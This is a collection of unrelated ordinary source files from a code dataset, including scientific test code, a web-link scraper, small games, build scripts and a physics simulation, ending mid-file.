get_dataset_path(\"gamma_test.simtel.gz\")\n\ndef test_hessio_file_reader():\n with SimTelEventSource(input_url=dataset) as reader:\n assert reader.is_compatible(dataset)\n assert not reader.is_stream\n for event in reader:\n if event.count == 0:\n assert event.r0.tels_with_data == {38, 47}\n elif event.count == 1:\n assert event.r0.tels_with_data == {11, 21, 24, 26, 61, 63, 118,\n 119}\n else:\n break\n for event in reader:\n # Check generator has restarted from beginning\n assert event.count == 0\n break\n\n # test that max_events works:\n max_events = 5\n with SimTelEventSource(input_url=dataset, max_events=max_events) as reader:\n count = 0\n for _ in reader:\n count += 1\n assert count == max_events\n\n # test that the allowed_tels mask works:\n with SimTelEventSource(input_url=dataset, allowed_tels={3, 4}) as reader:\n for event in reader:\n assert event.r0.tels_with_data.issubset(reader.allowed_tels)\n\n\ndef test_that_event_is_not_modified_after_loop():\n\n dataset = get_dataset_path(\"gamma_test.simtel.gz\")\n with SimTelEventSource(input_url=dataset, max_events=2) as source:\n for event in source:\n last_event = copy.deepcopy(event)\n\n # now `event` should be identical with the deepcopy of itself from\n # inside the loop.\n # Unfortunately this does not work:\n # assert last_event == event\n # So for the moment we just compare event ids\n assert event.r0.event_id == last_event.r0.event_id\n","sub_path":"ctapipe/io/tests/test_simtel_event_source.py","file_name":"test_simtel_event_source.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"141810284","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\nimport csv\r\n\r\nlink_list = []\r\n\r\nwith open(\"unicode_pages_2nd_tier.csv\") as f:\r\n for subpage in map(str.strip,f): # Number of pages plus one\r\n url = \"http://www.unicode.org/{}\".format(subpage)\r\n\r\n uni_page = requests.get(url)\r\n\r\n if uni_page.status_code != 200:\r\n print (\"there was an error with\", url)\r\n\r\n\r\n page_html = uni_page.text\r\n\r\n page_html = page_html.encode('ascii', 'ignore').decode('ascii')\r\n\r\n soup = BeautifulSoup(page_html, \"html.parser\")\r\n #\r\n for link in soup.find_all(\"a\"):\r\n alink = link.get('href')\r\n # for lnk in alink:\r\n with open('unicode_links_2nd.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([subpage, alink])\r\n\r\n print(subpage, alink)\r\n # # story_table = soup.find_all(\"td\", attrs = {\"style\" : \"border: 0px solid rgb(116, 116, 116);\"})\r\n # #\r\n # # for table_row in story_table:\r\n # # a_row = table_row.find_all(\"table\", attrs = {\"width\" : \"98%\"})\r\n # #\r\n # # for row in a_row:\r\n # # a_link = row.find_all(\"a\")\r\n # #\r\n # for the_link in page_links:\r\n # a_link = the_link.find_all(\"href\")\r\n # link_list.append(a_link)\r\n#CURRENTLY: (NOON 6/30) IS NOT WRITING TO A LIST, JUST LOOPING THROUGH AND LOOKING.\r\n#NEED TO GET JUST THE HREF, WITHOUT AN IDIOT ERROR.\r\n#WHY\r\n\r\n#\r\n # print(link.get(\"href\")) this successfully prints the links\r\n# #\r\n\r\n#okay, it just needs to be inside another loop so it doesn't overwrite, and I think you'll have it\r\n","sub_path":"unicode_links.py","file_name":"unicode_links.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"4791647","text":"'''Functions for cleaning data'''\n\nfrom typing import List\nfrom model_types import (Example, ExampleBuckets, Dataset, EncodingLength, Triplet,\n Triplets, LossInputType)\n\ndef dataset_to_buckets(dataset: Dataset) -> ExampleBuckets:\n '''\n Turns a dataset of (examples, labels) into a list of buckets:\n [[examples labeled 0], [examples labeled 1], ...]\n '''\n examples, labels = dataset\n example_buckets: List[List[Example]] = []\n max_label = max(labels)\n for bucket_index in range(max_label + 1): # pylint: disable = unused-variable\n example_buckets.append([])\n\n for example_index, example_value in enumerate(examples):\n bucket_number = labels[example_index]\n value = example_value.flatten() # assumes that its a numpy ndarray\n example_buckets[bucket_number].append(value)\n\n assert True not in [len(bucket) < 2 for bucket in example_buckets], \"Each label must have at least two examples to be trained with triplet loss\"\n\n return example_buckets\n\ndef get_zeroed_pred_triplets(amount: int, output_size: EncodingLength) -> LossInputType:\n '''\n Returns a list of zeroed triplets that fools Keras into thinking this is the true predicted values\n Generally used because using K.zeros_like causes my computer to freeze for some reason.\n '''\n\n return [[[0] * output_size * 3] * amount]\n\ndef isolate_triplet(triplet_index: int, triplets: Triplets) -> Triplets:\n '''\n Isolates a particular triplet from within many triplets\n Return value can be passed to the triplet model\n '''\n return [[triplets[0][triplet_index]], [triplets[1][triplet_index]], [triplets[2][triplet_index]]]\n\ndef get_triplet(triplet_index: int, triplets: Triplets) -> Triplet:\n '''\n Gets a particular triplet from triplets\n Return value can be passed to the encoder model\n '''\n return [triplets[0][triplet_index], triplets[1][triplet_index], triplets[2][triplet_index]]\n","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"604771724","text":"'''\nDeveloper: Adam M. Terwilliger\nVersion: February 12, 2018\nPurpose: CSE 802 -- HW1 - Q1\nDetails: Pattern Recognition course at MSU\n\t\t explore well-known Iris dataset\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# iris dataset metadata\ncolors = ['red', 'blue', 'green']\nlabel_names = ['setosa', 'versicolor','virginica']\nfeat_names = ['sepal length in cm (x1)', 'sepal width in cm (x2)', 'petal length in cm (x3)','petal width in cm (x4)']\nfeats = np.zeros((150,4))\nlabels = np.zeros((150,1)).astype(np.int)\n\n# read iris data into numpy arrays\niris_file = open('iris_data.txt')\nline_num = 0\nfor line in iris_file:\n\tlineParts = line.rstrip().split('\\t')\n\tcurr_feat = lineParts[:4]\n\tcurr_feat = [float(x) for x in curr_feat]\n\tfeats[line_num] = curr_feat\n\tlabels[line_num] = int(lineParts[-1])\n\tline_num +=1\n\n# part a - plot histograms for feats per class\nfor feat_plot in range(feats.shape[1]):\t\n\tfor label in np.unique(labels):\n\t\tcurr_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tcurr_plot.append(feats[feat_num, feat_plot])\n\n\t\tplt.hist(curr_plot, color=colors[label-1], label=label_names[label-1])\n\tplt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n\n# part b - plot scatter for feat 1/2 and feat 1/4\ncomparison = [[0,1], [0,3]]\nfor comp in comparison:\t\n\tfor label in np.unique(labels):\n\t\tfeat0_plot = []\n\t\tfeat1_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tfeat0_plot.append(feats[feat_num, comp[0]])\n\t\t\t\tfeat1_plot.append(feats[feat_num, comp[1]])\n\n\t\tplt.scatter(feat0_plot, feat1_plot, color=colors[label-1], label=label_names[label-1])\n\tplt.xlabel(feat_names[comp[0]])\n\tplt.ylabel(feat_names[comp[1]])\n\t#plt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n\n# part c - plot 3d scatter for feat 1/2/4\ncomparison = [[0,1,3]]\nfor comp in comparison:\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\t\n\tfor label in np.unique(labels):\n\t\tfeat0_plot = []\n\t\tfeat1_plot = []\n\t\tfeat2_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tfeat0_plot.append(feats[feat_num, comp[0]])\n\t\t\t\tfeat1_plot.append(feats[feat_num, comp[1]])\n\t\t\t\tfeat2_plot.append(feats[feat_num, comp[2]])\n\n\t\tax.scatter(feat0_plot, feat1_plot, feat2_plot, color=colors[label-1], label=label_names[label-1])\n\tax.set_xlabel(feat_names[comp[0]])\n\tax.set_ylabel(feat_names[comp[1]])\n\tax.set_zlabel(feat_names[comp[2]])\n\t#plt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n","sub_path":"hw1/hw1_q1.py","file_name":"hw1_q1.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546325610","text":"from setuptools import setup\nfrom glob import glob\n\npackage_name = 'tw07'\n\nsetup(\n name=package_name,\n version='3.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (f'share/{package_name}/launch', glob('launch/*_launch.py')),\n (f'share/{package_name}/config', glob('config/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Hugo Costelha',\n maintainer_email='hugo.costelha@ipleiria.pt',\n description='tw07 - Particle Filter',\n license='BSD',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'particle_filter = tw07.particle_filter:main',\n 'ground_truth_republisher = tw07.ground_truth_republisher:main',\n ],\n },\n)\n","sub_path":"src/tw07/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"599164609","text":"from TreeNode import TreeNode\n\ndef levelOrderTraversal(root: TreeNode):\n stack=[root]\n while len(stack)>0:\n tree=stack.pop(0)\n if tree is None:\n continue\n stack.append(tree.left)\n stack.append(tree.right)\n # do something here, e.g. print itself\n print(tree.val)\n\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n root.left.left = TreeNode(4)\n root.left.right = TreeNode(5)\n root.right.left = TreeNode(6)\n root.left.left.right = TreeNode(7)\n levelOrderTraversal(root)\n","sub_path":"code/tree/levelOrderTraversal.py","file_name":"levelOrderTraversal.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"468358693","text":"\"\"\"A game of Rock, Paper, Scissors, Lizard, Spock.\"\"\"\n\nimport random\nimport sys\n\nCHOICES = [\"S\", \"P\", \"R\", \"L\", \"K\"]\n\nCHOICES_DICT = {\n \"S\": \"Scissors\",\n \"P\": \"Paper\",\n \"R\": \"Rock\",\n \"L\": \"Lizard\",\n \"K\": \"Spock\"\n}\n\nVERBS = {\n \"SP\": \"cuts\",\n \"PR\": \"covers\",\n \"RL\": \"crushes\",\n \"LK\": \"poisons\",\n \"KS\": \"smashes\",\n \"SL\": \"decapitates\",\n \"LP\": \"eats\",\n \"PK\": \"disproves\",\n \"KR\": \"vaporizes\",\n \"RS\": \"crushes\"\n}\n\n\ndef player_choice():\n \"\"\"Ask the player for their choice.\"\"\"\n player_move = input(\"What is your choice? (S, P, R, L, K)\").upper()\n while player_move not in CHOICES:\n player_move = input(\"What is your choice? (S, P, R, L, K)\").upper()\n return player_move\n\n\ndef dumb_comp():\n \"\"\"Have computer randomly choose between the 5 choices.\"\"\"\n comp_move = random.choice(CHOICES)\n return comp_move\n\n\ndef print_moves(player1, player2):\n \"\"\"Print out the player's and computer's move.\"\"\"\n print(\"Your move:\", CHOICES_DICT[player1])\n print(\"Computer's move:\", CHOICES_DICT[player2], \"\\n\")\n\n\ndef game_winner(player1, player2):\n \"\"\"Determine who wins using VERBS dictionary.\"\"\"\n # Tie = 0, Player = 1, Computer = 2\n if player1 == player2:\n winner = 0\n elif player1 + player2 in VERBS:\n winner = 1\n else:\n winner = 2\n return winner\n\n\ndef print_outcome(result, player1, player2):\n \"\"\"Print out result of the game using logic from game_winner.\"\"\"\n # Tie = 0, Player = 1, Computer = 2\n if result == 0:\n print(\"It's a tie.\", \"\\n\")\n elif result == 1:\n key = player1 + player2\n print(CHOICES_DICT[player1], VERBS[key], CHOICES_DICT[player2])\n print(\"You won!\", \"\\n\")\n elif result == 2:\n key = player2 + player1\n print(CHOICES_DICT[player2], VERBS[key], CHOICES_DICT[player1])\n print(\"Computer wins!\", \"\\n\")\n\n\nif __name__ == '__main__':\n print(\"Lets play Rock, Paper, Scissors, Lizard, Spock!\")\n ties, player_wins, comp_wins, games_played = 0, 0, 0, 0\n\n while 1:\n player = player_choice()\n computer = dumb_comp()\n print_moves(player, computer)\n game_result = game_winner(player, computer)\n print_outcome(game_result, player, computer)\n games_played += 1\n\n if game_result == 0:\n ties += 1\n elif game_result == 1:\n player_wins += 1\n elif game_result == 2:\n comp_wins += 1\n\n play_again = input(\"Play again?\").lower()\n\n while play_again not in [\"yes\", \"y\", \"no\", \"n\"]:\n play_again = input(\"Play again?\").lower()\n if play_again in [\"no\", \"n\"]:\n tie_percent = str(int(ties / games_played * 100)) + \"%\"\n player_win_percent = str(\n int(player_wins / games_played * 100)) + \"%\"\n comp_win_percent = str(int(comp_wins / games_played * 100)) + \"%\"\n\n print(\"=== SCORES ===\")\n print(\"Games:\", games_played)\n print(\"Player Wins:\", player_wins, player_win_percent)\n print(\"Computer Wins:\", comp_wins, comp_win_percent)\n print(\"Ties:\", ties, tie_percent)\n sys.exit()\n","sub_path":"python/challenge159_RockPaperScissors.py","file_name":"challenge159_RockPaperScissors.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629216457","text":"from django.urls import path\nfrom . import views\n\napp_name = 'api'\n\nurlpatterns = [\n path('v1/status/', views.status, name='status'),\n path('v1/events/', views.list_events, name='events'),\n path('v1/events//', views.detail_event, name='detail_event'),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227264253","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\n\ndef setup():\n shelltools.makedirs(\"build\")\n shelltools.cd(\"build\")\n options = \"meson --prefix=/usr --sysconfdir=/etc \\\n --libexec=/usr/libexec/at-spi2 \\\n -Dintrospection=enabled \\\n -Ddbus_daemon=/usr/bin/dbus-daemon \\\n -D docs=true \\\n \"\n \n if get.buildTYPE() == \"emul32\":\n options += \"--datadir=/usr/emul32 \\\n --libexec=/usr/emul32 \\\n --sysconfdir=/usr/emul32 \\\n --libdir=lib32 \\\n -Dintrospection=disabled \\\n -D docs=false ..\"\n\n \n shelltools.system(options)\n \ndef build():\n shelltools.cd(\"build\")\n shelltools.system(\"ninja\")\n \ndef install():\n shelltools.cd(\"build\")\n shelltools.system(\"DESTDIR=%s ninja install\" % get.installDIR())\n \n if get.buildTYPE() == \"emul32\":\n #pisitools.dosed(\"%s/usr/share/dbus-1/services\" % get.installDIR(), \"^(Exec=)\\/usr/tmp\", r\"\\1/usr/libexec/at-spi2\")\n #pisitools.dosed(\"%s/usr/share/dbus-1/accessibility-services\" % get.installDIR(), \"^(Exec=)\\/usr/tmp\", r\"\\1/usr/libexec/at-spi2\")\n pisitools.dosed(\"%s/usr/lib/systemd/user\" % get.installDIR(), \"^(ExecStart=)\\/usr/emul32\", r\"\\1/usr/libexec/at-spi2\")\n pisitools.removeDir(\"/usr/emul32\")\n pisitools.dosym(\"/usr/libexec/at-spi2/at-spi-bus-launcher\", \"/usr/lib/at-spi2-core/at-spi-bus-launcher\")\n return\n \n shelltools.cd(\"..\")\n pisitools.dodoc(\"NEWS\", \"README*\")\n","sub_path":"desktop/misc/at-spi2-core/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"245024410","text":"import tkinter as tk\nimport socket\nimport threading\nfrom PIL import ImageTk, Image\n\nFont_tuple1 = (\"Comic Sans MS\", 20, \"bold\")\nFont_tuple2 = (\"Comic Sans MS\", 13)\n\nclass CustomLabel(tk.Label):\n\n def __init__(self,index, **args):\n tk.Label.__init__(self, **args)\n self.index = index\n\nclass Gui:\n\n def __init__(self):\n self.game_grid = [' ' for i in range(9)]\n self.window = tk.Tk()\n self.window.title('Tic tac toe Game')\n self.window.config(bg='#00ddb0')\n self.window.geometry('600x700')\n self.window.resizable(False, False)\n \n self.label_List = []\n self.symbol_image=None\n\n for i in range(9):\n label = CustomLabel(i,bg='#00ddb0', width=200, height=200, relief='groove', borderwidth=4)\n self.label_List.append(label)\n label.place(x=(i%3)*200, y=(i//3)*200)\n\n self.labelFooter = tk.Label(bg='#210070', width=600, height=200, relief='groove', borderwidth=4)\n self.labelFooter.place(x=0, y=600)\n\n self.result_label = tk.Label(text= 'hello',font=Font_tuple2,bg='#210070', fg='#00ddb0')\n self.result_label.place(x=280, y=640)\n\n symbol_thread = threading.Thread(target=self.get_input)\n symbol_thread.start()\n self.window.mainloop()\n\n\n def get_input(self):\n\n symbol = input('>>Enter symbol(X,O):')\n\n if symbol.upper()=='X':\n self.symbol_image = self.get_img('./pics/cross.png')\n else:\n self.symbol_image = self.get_img('./pics/nought.png')\n\n for i in range(9):\n self.label_List[i].bind('', self.display_img)\n\n def get_img(self,img_path):\n img = Image.open(img_path)\n resized_img = img.resize((200,200), Image.ANTIALIAS)\n res_img = ImageTk.PhotoImage(resized_img)\n\n return res_img\n\n\n def display_img(self, event):\n widget = event.widget\n widget.config(image=self.symbol_image)\n print(widget.index)\n\n\ngui= Gui()","sub_path":"gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281428232","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nScript for trimming sequences on certain number of nucleotides\nfor removing adapters traces.\n\"\"\"\n\nimport re\nfrom Bio import SeqIO\n\ntrim_left = 45\ntrim_right = 80\n\nfor seq_record in SeqIO.parse(\"MULTIFASTA_FILE_PATH\", \"fasta\"):\n with open(\"MULTIFASTA_FILE_PATH\", \"a\") as mf_trim:\n mf_trim.write(f\">{seq_record.id}\\n\")\n if re.search(\"dir\", seq_record.id):\n seq = str(seq_record.seq)[trim_left:]\n mf_trim.write(seq)\n elif re.search(\"rev\", seq_record.id):\n seq = str(seq_record.seq)[trim_right:]\n mf_trim.write(seq)\n mf_trim.write(\"\\n\")\n","sub_path":"trim_seq.py","file_name":"trim_seq.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414966697","text":"##########################################\n#\n# Test Data File for the PCC Smoke Test\n#\n##########################################\n\n\n # PCC Login Data\n# Login into PCC mentioned into Server URL\n# E.g. Here it will be Login into PCC-216\nserver_url = \"https://172.17.2.216:9999\"\nuser_name = \"admin\"\nuser_pwd = \"admin\"\n\n #Node data\ntotal_invader = 1\ntotal_server = 2\n\n # Test Data for Invader as Node\n# Update This data as per supported Invader over PCC server\ninvader_node_name = \"i58\"\ninvader_node_host = \"172.17.2.58\"\n\n\n # Test Data to Add Server as Node\n# Update This data as per supported Server over PCC\nserver1_node_name = \"sv8\"\nserver1_node_host = \"172.17.2.101\"\nserver1_bmc_host = \"172.17.3.101\"\nserver1_bmc_user = \"ADMIN\"\nserver1_bmc_pwd = \"ADMIN\"\nserver1_console = \"ttyS1\"\nserver1_managed_by_pcc = \"true\"\nserver1_ssh_keys = \"pcc\"\n\nserver2_node_name = \"sv8\"\nserver2_node_host = \"172.17.2.102\"\nserver2_bmc_host = \"172.17.3.102\"\nserver2_bmc_user = \"ADMIN\"\nserver2_bmc_pwd = \"ADMIN\"\nserver2_console = \"ttyS1\"\nserver2_managed_by_pcc = \"true\"\nserver2_ssh_keys = \"pcc\"\n\n\ntotal_group = 2\n# Test Data for Group Creation\ncreate1_group_name = \"automation_group1\"\ncreate1_group_desc = \"automation_group1\"\ncreate2_group_name = \"automation_group2\"\ncreate2_group_desc = \"automation_group2\"\n\n\n# Assign Group To Node\n# Please make sure group name is present in group list\n# before select group name\n# By Default keep it as \"automation_group\" as we are creating this\n# group just before group assignment test\nassign_group_name = \"automation_group1\"\n\n\ntotal_role = 2\n# Node Role Creation Data\n# It will assign ROOT as role Tenant\ncreate1_role_name = \"automation_role1\"\ncreate1_role_desc = \"automation_role1\"\ncreate2_role_name = \"automation_role2\"\ncreate2_role_desc = \"automation_role2\"\n\n# Assign Roles To Node\n# Please make sure role name is present in role list\n# before select group role\n# By Default it will assign \"LLDP\" roles to node\nassign_role_name = \"LLDP\"\n\n\ntotal_site = 2\n# Site Creation Data\ncreate1_site_name = \"automation_site1\"\ncreate1_site_desc = \"automation_site1\"\ncreate2_site_name = \"automation_site2\"\ncreate2_site_desc = \"automation_site2\"\n\n# Assign Sites To Node\n# Please make sure Site name is present in Site list\n# before select Site name\n# By Default it will assign \"automation_site\" site to node\nassign_site_name = \"automation_site1\"\n\n\ntotal_tenant = 2\n# Tenant Creation Data\ncreate1_tenant_name = \"automation_tenant1\"\ncreate1_tenant_desc = \"automation_tenant1\"\ncreate2_tenant_name = \"automation_tenant2\"\ncreate2_tenant_desc = \"automation_tenant2\"\n\n # Assign Tenant To Node\n# Please make sure Tenant name is present in Tenant list\n# before select Tenant name\n# By Default it will assign \"automation_tenant\" tenant to node\nassign_tenant_name = \"automation_tenant1\"\n","sub_path":"pcc/test_data/vm216/Smoke_Test_216.py","file_name":"Smoke_Test_216.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69639152","text":"import os\nimport MuonConst as muCnst\nimport PionConst as piCnst\nimport nuSTORMPrdStrght as nuPrdStrt\nimport NeutrinoEventInstance as nuEvtInst\nimport PionEventInstance as piEvtInst\nimport numpy as np\nimport Simulation as Simu\nimport sys\nimport particle as particle\nimport eventHistory as eventHistory\n\nnuSIMPATH = os.getenv('nuSIMPATH')\nfilename = os.path.join(nuSIMPATH, \\\n '11-Parameters/nuSTORM-PrdStrght-Params-v1.0.csv')\nnuStrt = nuPrdStrt.nuSTORMPrdStrght(filename)\n \n\nmc = muCnst.MuonConst()\npc = piCnst.PionConst()\n\nnuEI = []\npiEI = []\n\nrunNum = 1\neventNum = 1\n#Not sure about the values\n\n\n#Running PiEvt and NuEvt together\nfor i in range(10000):\n\n piEvt= piEvtInst.PionEventInstance(8)\n piEI.append(piEvt)\n tpi=piEvt.gettpi()\n piTraceSpaceCoord=piEvt.getTraceSpaceCoord()\n mu4mmtm=piEvt.getmu4mmtm()\n mucostheta=piEvt.getcostheta()\n nuEI.append(nuEvtInst.NeutrinoEventInstance(tpi, piTraceSpaceCoord, mu4mmtm, mucostheta, nuStrt))\n\nobj = eventHistory.eventHistory()\nobj.outFile(\"testFile1.root\")\nobj.rootStructure()\n\n#Storing the information in particle format\nfor (piEvt,nuEvt) in zip(piEI,nuEI):\n eventWeight = 1 \n #Target\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"pi-\")\n location = 'target'\n obj.addParticle(location, testParticle)\n \n #Production Straight \n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"pi-\")\n location = 'productionStraight'\n obj.addParticle(location, testParticle)\n \n # 1.Pion decay\n tpi = piEvt.gettpi()\n TSCpi = piEvt.getTraceSpaceCoord()\n ppiz = piEvt.getppiGen()\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], TSCpi[4]*ppiz, TSCpi[5]*ppiz, ppiz, tpi, eventWeight, \"pi-\")\n location = 'pionDecay'\n obj.addParticle(location, testParticle)\n\n #Pion Flash\n numu4mmtm = piEvt.getnumu4mmtm()\n numu3mmtm = numu4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], numu3mmtm[0], numu3mmtm[1], numu3mmtm[2], tpi, eventWeight, \"numu\")\n location=\"piFlashNu\"\n obj.addParticle(location, testParticle)\n\n \n #Muon Production\n mu4mmtm = piEvt.getmu4mmtm()\n mu3mmtm = mu4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCpi[0], TSCpi[1], TSCpi[2], TSCpi[3], mu3mmtm[0], mu3mmtm[1], mu3mmtm[2], tpi, eventWeight, \"mu-\")\n location = \"muonProduction\"\n obj.addParticle(location, testParticle)\n\n \n if(nuEvt.getAbsorbed() == True):\n eventWeight=0\n \n #1. Muon Decay\n tmu = nuEvt.gettmu()\n TSCmu = nuEvt.getTraceSpaceCoord()\n pmuz = nuEvt.getpmu()\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], TSCmu[4]*pmuz, TSCmu[5]*pmuz, pmuz, tmu, eventWeight, \"mu-\")\n location='muonDecay'\n obj.addParticle(location, testParticle)\n\n \n #2. Electron Production\n e4mmtm = nuEvt.gete4mmtm()\n e3mmtm = e4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], e3mmtm[0], e3mmtm[1], e3mmtm[2], tmu, eventWeight, \"e-\")\n location='eProduction'\n obj.addParticle(location, testParticle)\n\n \n #3. nue Production\n nue4mmtm = nuEvt.getnue4mmtm()\n nue3mmtm = nue4mmtm[1]\n testParticle = particle.particle(1, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], nue3mmtm[0], nue3mmtm[1], nue3mmtm[2], tmu, eventWeight, \"nue\")\n location='nueProduction'\n obj.addParticle(location, testParticle)\n \n \n #4. numu Production\n numu4mmtm = nuEvt.getnumu4mmtm()\n numu3mmtm = numu4mmtm[1]\n testParticle = particle.particle(runNum, eventNum, TSCmu[0], TSCmu[1], TSCmu[2], TSCmu[3], numu3mmtm[0], numu3mmtm[1], numu3mmtm[2], tmu, eventWeight, \"numu\")\n location='numuProduction'\n obj.addParticle(location, testParticle)\n \n # numu Detector\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"numu\")\n location = 'numuDetector'\n obj.addParticle(location, testParticle)\n \n # nue Detector\n testParticle = particle.particle(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, \"nue\")\n location = 'nueDetector'\n obj.addParticle(location, testParticle)\n obj.fill()\n \n \nobj.write()\nobj.outFileClose() \n\n\n","sub_path":"01-Code/nuSTORMring.py","file_name":"nuSTORMring.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451870121","text":"import sys\nimport pylab as plt\nimport pickle\nimport numpy as np\nimport scipy.io\nimport core_code as cc\nimport torch\nimport random\nnp.random.seed(0)\ntorch.manual_seed(0)\nrandom.seed(2)\nfrom xp_completion_einstein import extract_observed_entries\n#plt.style.use('ggplot')\nfrom matplotlib import rc \n#rc('font',**{'sans-serif':['Helvetica']})\n\n#rc('text', usetex=True)\n\ndef tt_parameters(imsize, rank):\n \"\"\"\n This function returns the number of parameters of a TT decomposition with\n uniform rank [rank] of a tensor of shape imsize\n \"\"\"\n rank = [rank] * (len(imsize)-1)\n d_left = np.cumprod(imsize)[:-1]\n d_right = np.cumprod(imsize[::-1])[::-1][1:]\n for i in range(len(rank)):\n rank[i] = np.min([rank[i],d_left[i],d_right[i]])\n rank.insert(0,1); rank.append(1)\n imsize.insert(0,1); imsize.append(1)\n L = [rank[i-1]*rank[i]*imsize[i] for i in range(1,len(imsize)-1)]\n return np.sum(L)\n\n\norder='F'\n\nnploty=7\nnplotx=5\nfig_args={'dpi':250,'figsize':(nplotx,nploty)}\nfontsize=5\nlw=2\nms=3\nimport core_code as cc\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 2:\n\t\tprint(f\"usage: python {sys.argv[0]} [results-pickle-file(s)]\\n \\t results-pickle-file(s): pickle file(s) containing results\")\n\n\tif 'einstein' in sys.argv[1]:\n\t\txp = 'einstein'\n\t\timage = scipy.io.loadmat('data/Einstein.mat')['Data'] \n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape([6,10,10,6,10,10,3],order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\t# results from Wang's paper\n\t\ttr_als_errors=[33.97,14.03,10.83,14.55]\n\t\ttr_als_params=[55*2**2,55*10**2,55*18**2,55*28**2]\n\t \n\t\ttt_als_errors=[38.51, 22.89, 20.70, 23.19]\n\t\ttt_als_params=[202,3545,10089,22949]\n\telif 'yale' in sys.argv[1]:\n\t\txp = 'yale'\n\t\ttensor_shape = [6,8,6,7,8,8,19,2]\n\t\timage = scipy.io.loadmat('data/YaleBCrop025.mat')['I']\n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape(tensor_shape,order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\ttr_als_params = [np.sum(tensor_shape) * R**2 for R in [5,10,15,20,25,30]]\n\t\tprint(tr_als_params)\n\t\tprint(tensor_shape)\n\t\ttr_als_errors = [33.45, 24.67, 20.72, 18.47, 16.92, 16.25]\n\n\t\ttt_als_params = [1149, 3800, 7855, 13360, 20315, 28720]\n\t\ttt_als_errors = [37.08, 29.65, 27.91, 26.84, 26.16, 25.55,]\n\telif 'video' in sys.argv[1]:\n\t\txp = 'video'\n\t\ttensor_shape=[5,2,5,2, 13,2,5,2, 3, 5,17]\n\t\timage = 